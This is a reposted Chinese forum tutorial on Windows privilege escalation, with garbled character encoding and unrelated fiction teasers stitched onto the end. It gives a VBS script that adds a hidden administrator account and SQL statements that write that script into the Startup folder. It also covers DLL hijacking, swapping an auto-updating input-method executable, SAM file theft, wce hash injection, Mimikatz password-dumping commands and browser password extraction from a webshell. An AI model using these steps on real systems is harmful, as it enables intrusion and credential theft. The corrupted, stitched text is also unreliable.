(轉(zhuǎn)自i春秋)提權(quán)第二部分

原文:http://bbs.ichunqiu.com/thread-8390-1-1.html?from=jianshu

問:被刪除的儲存過程如何被恢復(fù)?

一般管理員會刪除儲存過程敛纲,在我們手動恢復(fù)儲存過程時掠兄,經(jīng)常會發(fā)生各種錯誤像云。我們要對癥下藥,根據(jù)報錯信息蚂夕,找到問題所在迅诬。

0x03? 權(quán)限繼承類提權(quán)---基于DLL劫持的WebShell提權(quán)

什么是DLL劫持

DLL劫持的原因。

1婿牍、Windows的DLL稱為動態(tài)鏈接庫侈贷,動態(tài)鏈接庫技術(shù)的本質(zhì)實(shí)際上是將可執(zhí)行文件與庫文件分離,DLL庫文件通過導(dǎo)出表提供API接口等脂,PE加載器通過exe文件的導(dǎo)入表加載相應(yīng)的DLL俏蛮,并根據(jù)exe文件中的INT查詢DLL中的函數(shù)地址,同時寫入IAT上遥。

2搏屑、當(dāng)PE加載器根據(jù)exe文件的導(dǎo)入表加載DLL文件時,它會按照程序的當(dāng)前目錄-->system32目錄-->windows目錄-->

ATH環(huán)境變量設(shè)置的目錄來依次查找要加載的DLL文件粉楚。因此辣恋,我們可以在偽造一個導(dǎo)入表同名的DLL文件,放置到exe文件的目錄中,讓PE加載器加載我們偽造的DLL文件抑党,從而實(shí)現(xiàn)劫持包警。

3、DLL的轉(zhuǎn)發(fā)器功能為我們提供了必要的條件底靠,所謂DLL轉(zhuǎn)發(fā)器功能是將對某個DLL文件的導(dǎo)出函數(shù)調(diào)用轉(zhuǎn)到另一個DLL文件的導(dǎo)出函數(shù)中害晦。類似于下面的代碼:

xxx.dll

#pragma comment(linker, "/EXPORT:MessageBoxA = user32.MessageBoxA")

除了lpk.dll劫持,常常被黑客們使用的還有針對專門的第三方軟件的個性化dll暑中。

0x04? 權(quán)限繼承類提權(quán)

開機(jī)啟動項(xiàng)提權(quán)壹瘟?

windows開機(jī)時候都會有一些開機(jī)啟動的程序,那時候啟動的程序權(quán)限都是system鳄逾,因?yàn)槭莝ystem把他們啟動的稻轨,利用這點(diǎn),我們可以將自動化腳本寫入啟動項(xiàng)雕凹,達(dá)到提權(quán)的目的

關(guān)于自動化腳本殴俱?

不會寫vbs腳本?

Set wsnetwork=CreateObject("WSCRIPT.NETWORK")

os="WinNT://"&wsnetwork.ComputerName

Set ob=GetObject(os) '得到adsi接口枚抵,綁定

Set oe=GetObject(os&"/Administrators,group") '屬性线欲,admin組

Set od=ob.Create("user","nsfocus") '建立用戶

od.SetPassword "Nsf0cus123" '設(shè)置密碼

od.SetInfo

Set of=GetObject(os&"/nsfocus",user) '得到用戶

oe.add os&"/nsfocus"

保存成*.vbs,一般cmd中使用如下格式執(zhí)行:

C:>cscript *.vbs

我們有vbs之后的事......

TIPS:

1.通常我們會主動去重啟服務(wù)器汽摹,利用遠(yuǎn)程溢出(Ms12-020)或社工手法等李丰。

2.寫入腳本的時候也常常用數(shù)據(jù)庫去寫入

*連接mysql數(shù)據(jù)庫后執(zhí)行

1.創(chuàng)建a表列名cmd并寫入文本:

create table a (cmd text);

2.一條一條執(zhí)行:

insert into a values ("set wshshell=createobject (""wscript.shell"" ) " );

insert into a values ("a=wshshell.run (""cmd.exe /c net user 1 1 /add"",0) " );

insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators 1 /add"",0) " );

3.建立好列并寫入數(shù)據(jù)了,接著就是導(dǎo)出了逼泣。

C:\Documents and Settings\All Users\「開始」菜單\程序\啟動\這個是啟動目錄趴泌。

使用命令:select * from a into outfile "C:\Documents and Settings\All Users\「開始」菜單\程序\啟動\a.vbs"

成功導(dǎo)出vbs到啟動目錄

替換文件提權(quán)

搜狗拼音文件夾權(quán)限漏洞

D:\Program Files (x86)\SogouInput\7.0.0.9553\PinyinUp.exe

輸入法定時聯(lián)網(wǎng),更新詞庫拉庶,檢查版本等信息嗜憔,自動執(zhí)行。替換成我們想要的:加賬號砍的,讀密碼等提權(quán)操作痹筛。舉一反三莺治,很多類似的自動運(yùn)行的應(yīng)用程序廓鞠。獲取高權(quán)限賬號之后獲取Windows管理員賬號下載系統(tǒng)的 sam文件,(“%windir%system32\config\”)然后用SamInside等軟件進(jìn)行破解谣旁,只要能拿到床佳,肯花時間,就一定可以破解榄审。

復(fù)制不出來怎么辦砌们?——“冰刃(Iceword)”

獲取FTP賬號

滲透過程中我們可能會遇到目標(biāo)服務(wù)器上有ftp軟件,如果里面保存了重要的記錄,那就是意想不到的收獲浪感,讓它把我們帶到內(nèi)網(wǎng)更深處去昔头。很多ftp軟件的登錄信息都會保存在本地,有些在軟件根目錄影兽,bin揭斧,ini等文件中,有些則需要從軟件本身導(dǎo)出峻堰。

這里我們以flashfxp為例

讀取操作系統(tǒng)賬戶的密碼

滲透過程中讹开,為了下一步滲透,我們常常會需要管理員的操作系統(tǒng)密碼捐名、數(shù)據(jù)庫密碼旦万、常用密碼等信息。獲取操作系統(tǒng)密碼已經(jīng)有很多工具可以辦到了镶蹋,那么成艘,為什么我們可以利用工具輕松獲取到操作系統(tǒng)的常用密碼呢?

通常是從內(nèi)存里抓出active賬號的 lm hash和ntlm hash

介紹幾款工具

Wce.exe

wce.exe -w抓明文hash
wce.exe -l? 列出賬號NTLM的hash
wce.exe -s Hash注入

法國神器:Mimikatz

獲得緩存中的Hash值

1 cls? 清屏

2.exit? ? 退出

3.version? ? 查看mimikatz的版本

4.system::user? ? 查看當(dāng)前登錄的系統(tǒng)用戶

5.system::computer? ? 查看計算機(jī)名稱

6.process::list? ? 列出進(jìn)程

7.process::suspend 進(jìn)程名稱? ? 暫停進(jìn)程

8.process::stop 進(jìn)程名稱? ? 結(jié)束進(jìn)程

9.process::modules? ? 列出系統(tǒng)的核心模塊及所在位置

10.service::list? ? 列出系統(tǒng)的服務(wù)

11.service::remove? ? 移除系統(tǒng)的服務(wù)

12.service::start stop 服務(wù)名稱? ? 啟動或停止服務(wù)

13.privilege::list? ? 列出權(quán)限列表

14.privilege::enable? ? 激活一個或多個權(quán)限

15.privilege::debug? ? 提升權(quán)限

16.nogpo::cmd? ? 打開系統(tǒng)的cmd.exe

17.nogpo::regedit? ? 打開系統(tǒng)的注冊表

18.nogpo::taskmgr? ? 打開任務(wù)管理器

19.ts::sessions? ? 顯示當(dāng)前的會話

20.ts::processes? ? 顯示進(jìn)程和對應(yīng)的pid情況等

21.sekurlsa::wdigest? ? 獲取本地用戶信息及密碼

22.sekurlsa::tspkg? 獲取tspkg用戶信息及密碼

23.sekurlsa::logonPasswords? 獲登陸用戶信息及密碼

獲取瀏覽器中“保存下來”的密碼

chrome://settings/passwords

其實(shí)可以一次性讀出各種瀏覽器保存下來的密碼贺归,

推薦給大家一個神器的小工具:

BrowserPasswordDump

它具備了其他優(yōu)秀滲透小工具的優(yōu)點(diǎn)狰腌,可以在webshell中執(zhí)行,利用追加符號查看結(jié)果牧氮。而且輕量琼腔,速度快。

作者:i春秋論壇

鏈接:http://www.reibang.com/p/595f3511d970

來源:簡書

著作權(quán)歸作者所有踱葛。商業(yè)轉(zhuǎn)載請聯(lián)系作者獲得授權(quán)丹莲,非商業(yè)轉(zhuǎn)載請注明出處。

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末尸诽,一起剝皮案震驚了整個濱河市甥材,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌性含,老刑警劉巖洲赵,帶你破解...
    沈念sama閱讀 216,692評論 6 501
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異商蕴,居然都是意外死亡叠萍,警方通過查閱死者的電腦和手機(jī),發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,482評論 3 392
  • 文/潘曉璐 我一進(jìn)店門绪商,熙熙樓的掌柜王于貴愁眉苦臉地迎上來苛谷,“玉大人,你說我怎么就攤上這事格郁「沟睿” “怎么了独悴?”我有些...
    開封第一講書人閱讀 162,995評論 0 353
  • 文/不壞的土叔 我叫張陵,是天一觀的道長锣尉。 經(jīng)常有香客問我刻炒,道長,這世上最難降的妖魔是什么自沧? 我笑而不...
    開封第一講書人閱讀 58,223評論 1 292
  • 正文 為了忘掉前任落蝙,我火速辦了婚禮,結(jié)果婚禮上暂幼,老公的妹妹穿的比我還像新娘筏勒。我一直安慰自己,他們只是感情好旺嬉,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,245評論 6 388
  • 文/花漫 我一把揭開白布管行。 她就那樣靜靜地躺著,像睡著了一般邪媳。 火紅的嫁衣襯著肌膚如雪捐顷。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 51,208評論 1 299
  • 那天雨效,我揣著相機(jī)與錄音迅涮,去河邊找鬼。 笑死徽龟,一個胖子當(dāng)著我的面吹牛叮姑,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播据悔,決...
    沈念sama閱讀 40,091評論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼传透,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了极颓?” 一聲冷哼從身側(cè)響起朱盐,我...
    開封第一講書人閱讀 38,929評論 0 274
  • 序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎菠隆,沒想到半個月后兵琳,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 45,346評論 1 311
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡骇径,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,570評論 2 333
  • 正文 我和宋清朗相戀三年躯肌,在試婚紗的時候發(fā)現(xiàn)自己被綠了。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片既峡。...
    茶點(diǎn)故事閱讀 39,739評論 1 348
  • 序言:一個原本活蹦亂跳的男人離奇死亡羡榴,死狀恐怖碧查,靈堂內(nèi)的尸體忽然破棺而出运敢,到底是詐尸還是另有隱情校仑,我是刑警寧澤,帶...
    沈念sama閱讀 35,437評論 5 344
  • 正文 年R本政府宣布传惠,位于F島的核電站迄沫,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏卦方。R本人自食惡果不足惜羊瘩,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,037評論 3 326
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望盼砍。 院中可真熱鬧尘吗,春花似錦、人聲如沸浇坐。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,677評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽近刘。三九已至擒贸,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間觉渴,已是汗流浹背介劫。 一陣腳步聲響...
    開封第一講書人閱讀 32,833評論 1 269
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留案淋,地道東北人座韵。 一個月前我還...
    沈念sama閱讀 47,760評論 2 369
  • 正文 我出身青樓,卻偏偏與公主長得像踢京,于是被迫代替她去往敵國和親回右。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 44,647評論 2 354

推薦閱讀更多精彩內(nèi)容